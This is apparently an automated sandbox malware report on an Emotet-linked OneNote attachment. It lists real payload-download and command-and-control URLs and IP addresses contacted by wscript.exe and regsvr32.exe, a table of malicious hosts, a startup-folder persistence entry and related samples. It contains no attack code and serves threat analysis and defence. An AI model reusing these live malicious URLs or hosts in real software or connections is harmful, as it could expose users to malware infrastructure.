                                              https://160.16.142.56:8080/acfnurik/pjkp/regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://messaging.engagement.office.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                		high
                                                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0wscript.exe, 0000000A.00000003.342822550.00000000051FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                  		high
                                                  https://www.odwebp.svc.msD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.powerbi.com/v1.0/myorg/groupsD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                    		high
                                                    https://web.microsoftstream.com/video/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                      		high
                                                      https://api.addins.store.officeppe.com/addinstemplateD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://graph.windows.netD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                        		high
                                                        https://penshorn.org/8.wscript.exe, 0000000A.00000002.349109014.0000000005A3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345850174.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343482414.0000000005A34000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://consent.config.office.com/consentcheckin/v1.0/consentsD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                          		high
                                                          https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                            		high
                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                              		high
                                                              https://d.docs.live.netD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ncus.contentsync.D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                		high
                                                                http://weather.service.msn.com/data.aspxD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                  		high
                                                                  https://163.44.196.120:8080/acfnurik/pjkp/regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                    		high
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                      		high
                                                                      https://pushchannel.1drv.msD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                        		high
                                                                        https://104.168.155.143:8080/lregsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://wus2.contentsync.D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://clients.config.office.net/user/v1.0/iosD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                          		high
                                                                          https://91.121.146.47:8080/acfnurik/pjkp/regsvr32.exe, 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://o365auditrealtimeingestion.manage.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                            		high
                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                              		high
                                                                              https://159.89.202.34/acfnurik/pjkp/Gregsvr32.exe, 0000000D.00000002.561180722.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://clients.config.office.net/user/v1.0/android/policiesD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                		high
                                                                                https://164.90.222.65/acfnurik/pjkp/-regsvr32.exe, 0000000D.00000002.561840669.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://entitlement.diagnostics.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                  		high
                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                    		high
                                                                                    https://outlook.office.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                      		high
                                                                                      https://187.63.160.88:80/acfnurik/pjkp/qregsvr32.exe, 0000000D.00000002.561180722.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://storage.live.com/clientlogs/uploadlocationD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                        		high
                                                                                        https://microsoftapc-my.sharepoint.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://substrate.office.com/search/api/v1/SearchHistoryD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                          		high
                                                                                          https://104.168.155.143:8080/acfnurik/pjkp/regsvr32.exe, 0000000D.00000003.533810298.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallationD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                            		high
                                                                                            https://graph.windows.net/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                              		high
                                                                                              https://devnull.onenote.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                		high
                                                                                                https://messaging.office.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                  		high
                                                                                                  https://159.89.202.34/acfnurik/pjkp/regsvr32.exe, 0000000D.00000002.561840669.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                    		high
                                                                                                    https://skyapi.live.net/Activity/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.gomespontes.com.br/logs/pd/wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://159.65.88.10:8080/regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://api.cortana.aiD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://messaging.action.office.com/setcampaignactionD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                      		high
                                                                                                      https://visio.uservoice.com/forums/368202-visio-on-devicesD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                        		high
                                                                                                        https://staging.cortana.aiD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://onedrive.live.com/embed?D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                          		high
                                                                                                          https://augloop.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                            		high
                                                                                                            https://163.44.196.120:8080/Lregsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://159.65.88.10:8080/acfnurik/pjkp/regsvr32.exe, 0000000D.00000002.561463201.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://api.diagnosticssdf.office.com/v2/fileD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                              		high
                                                                                                              https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                		high
                                                                                                                https://api.diagnostics.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                  		high
                                                                                                                  https://store.office.de/addinstemplateD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                    		high
                                                                                                                    https://wus2.pagecontentsync.D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://api.powerbi.com/v1.0/myorg/datasetsD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                      		high
                                                                                                                      https://penshorn.org/admin/Ses8712iGR8du/otnwscript.exe, 0000000A.00000002.347557643.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321190525.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344931402.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.318167468.00000000030A8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      http://ozmeydan.com/cekici/9/xMwscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://cortana.ai/apiD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://104.168.155.143:8080/regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://160.16.142.56:8080/regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533810298.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://penshorn.org:443/admin/Ses8712iGR8du/wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://api.diagnosticssdf.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                        		high
                                                                                                                        https://login.microsoftonline.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                          		high
                                                                                                                          http://softwareulike.com/cWIYxWMPkK/wscript.exe, 0000000A.00000003.341234990.00000000058C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326264766.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.327332370.0000000005691000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324690932.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342738021.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324138518.000000000552F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348155400.00000000055CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.323566431.0000000005568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342349723.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.000000000561B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.0000000005894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341386251.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331489466.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330745932.000000000574C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325159441.0000000003100000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329876952.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331489466.0000000005730000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337214999.0000000005730000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326999840.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.323811413.0000000003150000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329739931.00000000055CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                            		high
                                                                                                                            https://api.addins.omex.office.net/appinfo/queryD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                              		high
                                                                                                                              https://clients.config.office.net/user/v1.0/tenantassociationkeyD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                                		high
                                                                                                                                https://powerlift.acompli.netD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://cortana.aiD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                                                                                                                  		high

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  110.232.117.186
                                                                                                                                  		unknownAustralia
                                                                                                                                  		56038RACKCORP-APRackCorpAUtrue
                                                                                                                                  103.132.242.26
                                                                                                                                  		unknownIndia
                                                                                                                                  		45117INPL-IN-APIshansNetworkINtrue
                                                                                                                                  104.168.155.143
                                                                                                                                  		unknownUnited States
                                                                                                                                  		54290HOSTWINDSUStrue
                                                                                                                                  79.137.35.198
                                                                                                                                  		unknownFrance
                                                                                                                                  		16276OVHFRtrue
                                                                                                                                  115.68.227.76
                                                                                                                                  		unknownKorea Republic of
                                                                                                                                  		38700SMILESERV-AS-KRSMILESERVKRtrue
                                                                                                                                  163.44.196.120
                                                                                                                                  		unknownSingapore
                                                                                                                                  		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                                                                                                                                  206.189.28.199
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  203.26.41.131
                                                                                                                                  		penshorn.orgAustralia
                                                                                                                                  		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                                                  107.170.39.149
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  66.228.32.31
                                                                                                                                  		unknownUnited States
                                                                                                                                  		63949LINODE-APLinodeLLCUStrue
                                                                                                                                  197.242.150.244
                                                                                                                                  		unknownSouth Africa
                                                                                                                                  		37611AfrihostZAtrue
                                                                                                                                  185.4.135.165
                                                                                                                                  		unknownGreece
                                                                                                                                  		199246TOPHOSTGRtrue
                                                                                                                                  183.111.227.137
                                                                                                                                  		unknownKorea Republic of
                                                                                                                                  		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                                  45.176.232.124
                                                                                                                                  		unknownColombia
                                                                                                                                  		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                                                                                  169.57.156.166
                                                                                                                                  		unknownUnited States
                                                                                                                                  		36351SOFTLAYERUStrue
                                                                                                                                  164.68.99.3
                                                                                                                                  		unknownGermany
                                                                                                                                  		51167CONTABODEtrue
                                                                                                                                  139.59.126.41
                                                                                                                                  		unknownSingapore
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  167.172.253.162
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  167.172.199.165
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  202.129.205.3
                                                                                                                                  		unknownThailand
                                                                                                                                  		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
                                                                                                                                  147.139.166.154
                                                                                                                                  		unknownUnited States
                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                  153.92.5.27
                                                                                                                                  		unknownGermany
                                                                                                                                  		47583AS-HOSTINGERLTtrue
                                                                                                                                  159.65.88.10
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  172.105.226.75
                                                                                                                                  		unknownUnited States
                                                                                                                                  		63949LINODE-APLinodeLLCUStrue
                                                                                                                                  164.90.222.65
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  213.239.212.5
                                                                                                                                  		unknownGermany
                                                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                                                  5.135.159.50
                                                                                                                                  		unknownFrance
                                                                                                                                  		16276OVHFRtrue
                                                                                                                                  186.194.240.217
                                                                                                                                  		unknownBrazil
                                                                                                                                  		262733NetceteraTelecomunicacoesLtdaBRtrue
                                                                                                                                  119.59.103.152
                                                                                                                                  		unknownThailand
                                                                                                                                  		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                                                                                                                                  159.89.202.34
                                                                                                                                  		unknownUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  91.121.146.47
                                                                                                                                  		unknownFrance
                                                                                                                                  		16276OVHFRtrue
                                                                                                                                  160.16.142.56
                                                                                                                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                                                  201.94.166.162
                                                                                                                                  		unknownBrazil
                                                                                                                                  		28573CLAROSABRtrue
                                                                                                                                  91.207.28.33
                                                                                                                                  		unknownKyrgyzstan
                                                                                                                                  		39819PROHOSTKGtrue
                                                                                                                                  103.75.201.2
                                                                                                                                  		unknownThailand
                                                                                                                                  		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                                                  103.43.75.120
                                                                                                                                  		unknownJapan20473AS-CHOOPAUStrue
                                                                                                                                  188.44.20.25
                                                                                                                                  		unknownMacedonia
                                                                                                                                  		57374GIV-ASMKtrue
                                                                                                                                  45.235.8.30
                                                                                                                                  		unknownBrazil
                                                                                                                                  		267405WIKINETTELECOMUNICACOESBRtrue
                                                                                                                                  153.126.146.25
                                                                                                                                  		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                  72.15.201.15
                                                                                                                                  		unknownUnited States
                                                                                                                                  		13649ASN-VINSUStrue
                                                                                                                                  187.63.160.88
                                                                                                                                  		unknownBrazil
                                                                                                                                  		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
                                                                                                                                  82.223.21.224
                                                                                                                                  		unknownSpain
                                                                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                  173.212.193.249
                                                                                                                                  		unknownGermany
                                                                                                                                  		51167CONTABODEtrue
                                                                                                                                  95.217.221.146
                                                                                                                                  		unknownGermany
                                                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                                                  149.56.131.28
                                                                                                                                  		unknownCanada
                                                                                                                                  		16276OVHFRtrue
                                                                                                                                  182.162.143.56
                                                                                                                                  		unknownKorea Republic of
                                                                                                                                  		3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                                  1.234.2.232
                                                                                                                                  		unknownKorea Republic of
                                                                                                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                  129.232.188.93
                                                                                                                                  		unknownSouth Africa
                                                                                                                                  		37153xneeloZAtrue
                                                                                                                                  94.23.45.86
                                                                                                                                  		unknownFrance
                                                                                                                                  		16276OVHFRtrue

                                                                                                                                  Private

                                                                                                                                  IP
                                                                                                                                  192.168.2.1

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                  Analysis ID:828501
                                                                                                                                  Start date and time:2023-03-17 09:18:43 +01:00
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 9m 10s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:19
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample file name:Insight_Medical_Publishing_1.one
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.expl.evad.winONE@12/693@1/50
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 50.2% (good quality ratio 42.4%)
                                                                                                                                  • Quality average: 60.5%
                                                                                                                                  • Quality standard deviation: 35.6%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 89%
                                                                                                                                  • Number of executed functions: 20
                                                                                                                                  • Number of non-executed functions: 135
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .one

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.76.141, 20.231.69.218, 20.223.225.174, 20.126.106.131, 93.184.221.240
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, config.officeapps.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                  • Report size getting too big, too many NtWriteFile calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  09:20:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                                                                                                                  09:20:27API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                                  09:20:53API Interceptor10x Sleep call for process: regsvr32.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  110.232.117.186Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                    Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                      OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                        Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
